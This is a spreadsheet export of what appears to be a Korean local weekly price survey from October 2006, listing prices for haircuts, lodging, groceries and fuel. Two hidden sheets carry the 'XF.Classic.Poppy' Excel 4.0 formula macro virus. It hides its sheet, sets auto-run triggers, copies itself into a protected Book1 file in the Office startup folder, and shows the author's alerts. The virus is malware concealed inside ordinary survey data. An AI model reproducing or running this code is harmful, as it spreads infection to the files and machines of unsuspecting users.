[38,"사진인화료","디지털사진인화요금,\n현상료 포함",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[39,"영상매체대여료","최신판 영화 DVD대여요금",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[40,"이용료(컷트)","성인조발 중류급 1회",2,2,12000,12000,0,"김지원미용실",12000,12000,0,"김영미용실",12000,12000,0]
[41,"미용료","성인여자 파마(일반)",2,2,50000,50000,0,"김지원미용실",50000,50000,0,"김영미용실",50000,50000,0]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",2,2,500,500,0,"옥곡공중목욕장",1000,1000,0,"없음",null,null,0]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",2,2,20000,20000,0,"대성장",40000,40000,0,"없음",null,null,0]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[46,"PC방\n이용료","1회 이용시",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[47,"택배이용료","20kg이하, 타지역",2,2,4000,4000,0,"로젠택배",8000,8000,0,"CU택배",null,null,0]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",2,2,0,0,0,"없음",null,null,0,"없음",null,null,0]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",2,2,{"$f":"IF(D84=0,0,SUM(J84,N84)/D84)","v":0},null,null,"없음",null,null,0,"없음",null,null,0]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(N86,\"<>0\")","v":1},1,{"$f":"IF(D86=0,0,SUM(J86,N86)/D86)","v":5350},5350,{"$f":"G86-F86","v":0},"옥곡5일시장",0,0,{"$f":"K86-J86","v":0},"옥곡하나로마트",5350,5350,{"$f":"O86-N86","v":0}]
[2,"두부","공장제품 1모",2,2,1075,1075,0,"옥곡5일시장",1000,1000,0,"옥곡하나로마트",1150,1150,0]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",1,1,1080,1080,0,"없음",0,0,0,"옥곡하나로마트",1080,1080,0]
[4,"식용유","콩기름 1.8ml",1,1,6980,6980,0,"없음",0,0,0,"옥곡하나로마트",6980,6980,0]
[5,"설탕","정백당 1kg",1,1,2380,2380,0,"없음",0,0,0,"옥곡하나로마트",2380,2380,0]
[6,"생수","플라스틱 1병(500㎖)",1,1,340,340,0,"없음",0,0,0,"옥곡하나로마트",340,340,0]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",1,1,1670,1670,0,"없음",0,0,0,"옥곡하나로마트",1670,1670,0]
[8,"소주","1병 360㎖\n(병 보증금 포함)",1,1,1340,1340,0,"없음",0,0,0,"옥곡하나로마트",1340,1340,0]
[9,"등유","주유소 판매 1ℓ",0,0,0,0,0,"없음",1350,1350,0,"없음",0,0,0]
[10,"경유","주유소 판매 1ℓ",0,0,0,0,0,"농협옥곡지점주유소",1435,1450,15,"여정광양만주유소",1429,1429,0]
[11,"휘발유","주유소 판매 1ℓ\n(무연)",0,0,0,0,0,"농협옥곡지점주유소",1515,1545,30,"여정광양만주유소",1536,1536,0]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",1,1,0,0,0,"없음",0,0,0,"없음",0,0,0]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",1,1,0,0,0,"없음",0,0,0,"없음",0,0,0]

{"sheet":"Sheet1","index":7,"n_rows":41,"n_cols":3,"rows_kept":41,"hidden":true}
["주간물가동향(2006.10.31).xls",null,{"$f":"WORKBOOK.HIDE(\"XL4Poppy\")","v":false}]
["Book1"]
["C:\\Program Files\\Microsoft Office\\Office\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[{"$error":"#N/A"},null,{"$f":"RUN(C18)","v":false}]
[null,null,{"$error":"#NAME?"}]
[null,null,{"$f":"#N/A","v":{"$error":"#N/A"}}]
["Classic.Poppy by VicodinES",null,{"$error":"#NAME?"}]
["With Lord Natas",null,{"$error":"#NAME?"}]
["An Excel Formula Macro Virus (XF.Classic)",null,{"$error":"#NAME?"}]
["Hydrocodone/APAP 10-650 For Your Computer",null,{"$f":"RUN(A21)","v":false}]
["(C) The Narkotic Network 1998",null,{"$f":"ON.TIME(\"6:30:00 PM\",\"Hello\")","v":false}]
[null,null,{"$f":"ON.TIME(\"6:30:00 AM\",\"Morning\")","v":false}]
[null,null,{"$f":"ON.SHEET(,\"Poppy\",TRUE)","v":false}]
["**Simple Payload**",null,{"$error":"#NAME?"}]
[{"$f":"ALERT(\"XF.Classic.Poppy by VicodinES\",2)","v":false}]
[{"$f":"ALERT(\"ⓒ 1998 The Narkotic Network\",2)","v":false}]
[{"$error":"#NAME?"},null,"**Set Our Values and Paths**"]
[null,null,{"$error":"#NAME?"}]
[null,null,{"$error":"#NAME?"}]
["**Add New Workbook, Infect It, Save It As Book1.xls**",null,{"$error":"#NAME?"}]
[{"$error":"#NAME?"},null,{"$error":"#NAME?"}]
[{"$error":"#NAME?"},null,{"$error":"#NAME?"}]
[{"$f":"#N/A","v":{"$error":"#N/A"}},null,{"$error":"#NAME?"}]
[{"$error":"#NAME?"}]
[{"$error":"#NAME?"}]
[{"$f":"NEW(1)","v":false},null,"**Infect Workbook**"]
[{"$f":"WORKBOOK.INSERT(1)","v":false},null,{"$f":"RUN(C19)","v":false}]
[{"$f":"WORKBOOK.INSERT(1)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"ACTIVATE.PREV()","v":false},null,{"$f":"#N/A","v":{"$error":"#N/A"}}]
[{"$f":"RUN(C18)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.COPY(\"XL4Poppy\",A1)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.NAME(\"Sheet3\",\"Sheet99\")","v":false},null,{"$f":"ACTIVATE.PREV()","v":false}]
[{"$f":"WORKBOOK.NAME(\"Sheet1\",\"Sheet3\")","v":false},null,{"$f":"RUN(C19)","v":false}]
[{"$f":"WORKBOOK.NAME(\"Sheet99\",\"Sheet1\")","v":false},null,{"$f":"WORKBOOK.COPY(\"XL4Poppy\",A1)","v":false}]
[{"$f":"PROTECT.DOCUMENT(TRUE,,\"VicodinES\",TRUE)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.PREV()","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.PREV()","v":false}]
[{"$f":"WORKBOOK.PREV()","v":false}]
[{"$f":"SAVE.AS(A3)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"FILE.CLOSE()","v":false},null,{"$f":"MESSAGE(TRUE,\"VicodinES and Lord Natas greet you a good morning!\")","v":false}]
[{"$error":"#NAME?"},null,{"$error":"#NAME?"}]

{"sheet":"--------","index":8,"n_rows":41,"n_cols":3,"rows_kept":41,"hidden":true}
["주간물가동향(2006.10.31).xls",null,{"$f":"WORKBOOK.HIDE(\"XL4Poppy\")","v":false}]
["Book1"]
["C:\\Program Files\\Microsoft Office\\Office\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[{"$error":"#N/A"},null,{"$f":"RUN(C18)","v":false}]
[null,null,{"$error":"#NAME?"}]
[null,null,{"$f":"#N/A","v":{"$error":"#N/A"}}]
["Classic.Poppy by VicodinES",null,{"$error":"#NAME?"}]
["With Lord Natas",null,{"$error":"#NAME?"}]
["An Excel Formula Macro Virus (XF.Classic)",null,{"$error":"#NAME?"}]
["Hydrocodone/APAP 10-650 For Your Computer",null,{"$f":"RUN(A21)","v":false}]
["(C) The Narkotic Network 1998",null,{"$f":"ON.TIME(\"6:30:00 PM\",\"Hello\")","v":false}]
[null,null,{"$f":"ON.TIME(\"6:30:00 AM\",\"Morning\")","v":false}]
[null,null,{"$f":"ON.SHEET(,\"Poppy\",TRUE)","v":false}]
["**Simple Payload**",null,{"$error":"#NAME?"}]
[{"$f":"ALERT(\"XF.Classic.Poppy by VicodinES\",2)","v":false}]
[{"$f":"ALERT(\"ⓒ 1998 The Narkotic Network\",2)","v":false}]
[{"$error":"#NAME?"},null,"**Set Our Values and Paths**"]
[null,null,{"$error":"#NAME?"}]
[null,null,{"$error":"#NAME?"}]
["**Add New Workbook, Infect It, Save It As Book1.xls**",null,{"$error":"#NAME?"}]
[{"$error":"#NAME?"},null,{"$error":"#NAME?"}]
[{"$error":"#NAME?"},null,{"$error":"#NAME?"}]
[{"$f":"#N/A","v":{"$error":"#N/A"}},null,{"$error":"#NAME?"}]
[{"$error":"#NAME?"}]
[{"$error":"#NAME?"}]
[{"$f":"NEW(1)","v":false},null,"**Infect Workbook**"]
[{"$f":"WORKBOOK.INSERT(1)","v":false},null,{"$f":"RUN(C19)","v":false}]
[{"$f":"WORKBOOK.INSERT(1)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"ACTIVATE.PREV()","v":false},null,{"$f":"#N/A","v":{"$error":"#N/A"}}]
[{"$f":"RUN(C18)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.COPY(\"XL4Poppy\",A1)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.NAME(\"Sheet3\",\"Sheet99\")","v":false},null,{"$f":"ACTIVATE.PREV()","v":false}]
[{"$f":"WORKBOOK.NAME(\"Sheet1\",\"Sheet3\")","v":false},null,{"$f":"RUN(C19)","v":false}]
[{"$f":"WORKBOOK.NAME(\"Sheet99\",\"Sheet1\")","v":false},null,{"$f":"WORKBOOK.COPY(\"XL4Poppy\",A1)","v":false}]
[{"$f":"PROTECT.DOCUMENT(TRUE,,\"VicodinES\",TRUE)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.PREV()","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.PREV()","v":false}]
[{"$f":"WORKBOOK.PREV()","v":false}]
[{"$f":"SAVE.AS(A3)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"FILE.CLOSE()","v":false},null,{"$f":"MESSAGE(TRUE,\"VicodinES and Lord Natas greet you a good morning!\")","v":false}]
[{"$error":"#NAME?"},null,{"$error":"#NAME?"}]

{"sheet":"Sheet2","index":9,"n_rows":17,"n_cols":8,"rows_kept":17,"merged":[[1,1,2,1],[1,2,2,2],[1,3,2,3],[1,4,1,6],[1,7,2,7],[3,1,12,1],[14,1,15,1]]}
[]
[null,"구 분","품 목","규 격","가격 조사 결과 (단위:원)",null,null,"비 고"]
[{"$nulls":4},"전주","금 주","등락가"]
[null,"농산물","무","상품 1개 1kg",{"$f":"총괄!F8","v":{"v":1460.4166666666667,"d":"1,460"}},{"$f":"총괄!G8","v":{"v":1363.3333333333333,"d":"1,363"}},{"$f":"총괄!H8","v":{"v":-97.08333333333348,"d":"-97"}}]
[null,null,"양파","1망(1kg)",{"$f":"총괄!F13","v":{"v":2790,"d":"2,790"}},{"$f":"총괄!G13","v":{"v":2800.8333333333335,"d":"2,801"}},{"$f":"총괄!H13","v":{"v":10.833333333333485,"d":"11"}}]
[null,null,"배추","1포기 3kg",{"$f":"총괄!F18","v":{"v":3495.8333333333335,"d":"3,496"}},{"$f":"총괄!G18","v":{"v":3537.5,"d":"3,538"}},{"$f":"총괄!H18","v":{"v":41.666666666666515,"d":"42"}}]
[null,null,"오이","상품 3개",{"$f":"총괄!F14","v":{"v":5047.083333333333,"d":"5,047"}},{"$f":"총괄!G14","v":{"v":5178.75,"d":"5,179"}},{"$f":"총괄!H14","v":{"v":131.66666666666697,"d":"132"}}]
[null,null,"상추","양상추 500g",{"$f":"총괄!F10","v":{"v":2464.1666666666665,"d":"2,464"}},{"$f":"총괄!G10","v":{"v":2624.4166666666665,"d":"2,624"}},{"$f":"총괄!H10","v":{"v":160.25,"d":"160"}}]
[null,null,"애호박","상품1개(250~300g)",{"$f":"총괄!F11","v":{"v":2874.1666666666665,"d":"2,874"}},{"$f":"총괄!G11","v":{"v":2978.3333333333335,"d":"2,978"}},{"$f":"총괄!H11","v":{"v":104.16666666666697,"d":"104"}}]
[null,null,"마늘","깐것 상품 1kg",{"$f":"총괄!F16","v":{"v":9907.5,"d":"9,908"}},{"$f":"총괄!G16","v":{"v":9465.833333333334,"d":"9,466"}},{"$f":"총괄!H16","v":{"v":-441.66666666666606,"d":"-442"}}]
[null,null,"감자","흰색1kg",{"$f":"총괄!F17","v":{"v":4524.083333333333,"d":"4,524"}},{"$f":"총괄!G17","v":{"v":4666.666666666667,"d":"4,667"}},{"$f":"총괄!H17","v":{"v":142.58333333333394,"d":"143"}}]
[null,null,"배","상품1개(650~700g)",{"$f":"총괄!F21","v":{"v":4878.333333333333,"d":"4,878"}},{"$f":"총괄!G21","v":{"v":4749.416666666667,"d":"4,749"}},{"$f":"총괄!H21","v":{"v":-128.91666666666606,"d":"-129"}}]
[null,null,"달걀","특란30개 한판",{"$f":"총괄!F27","v":{"v":8160.833333333333,"d":"8,161"}},{"$f":"총괄!G27","v":{"v":8081.666666666667,"d":"8,082"}},{"$f":"총괄!H27","v":{"v":-79.16666666666606,"d":"-79"}}]
[null,"축산물","쇠고기(한우)","등심 600g(상등육)",{"$f":"총괄!F23","v":{"v":55500,"d":"55,500"}},{"$f":"총괄!G23","v":{"v":51658.333333333336,"d":"51,658"}},{"$f":"총괄!H23","v":{"v":-3841.6666666666642,"d":"-3,842"}}]
[null,"수산물","명태","40cm1마리",{"$f":"총괄!F30","v":{"v":3860.25,"d":"3,860"}},{"$f":"총괄!G30","v":{"v":4044.4166666666665,"d":"4,044"}},{"$f":"총괄!H30","v":{"v":184.16666666666652,"d":"184"}}]
[null,null,"조기","15cm1마리",{"$f":"총괄!F28","v":{"v":2096.3333333333335,"d":"2,096"}},{"$f":"총괄!G28","v":{"v":2356.6666666666665,"d":"2,357"}},{"$f":"총괄!H28","v":{"v":260.33333333333303,"d":"260"}}]
[null,"공산품등","휘발유","주유소 판매 1ℓ",{"$f":"총괄!F96","v":{"v":1553.7,"d":"1,554"}},{"$f":"총괄!G96","v":{"v":1573.8,"d":"1,574"}},{"$f":"총괄!H96","v":{"v":20.09999999999991,"d":"20"}}]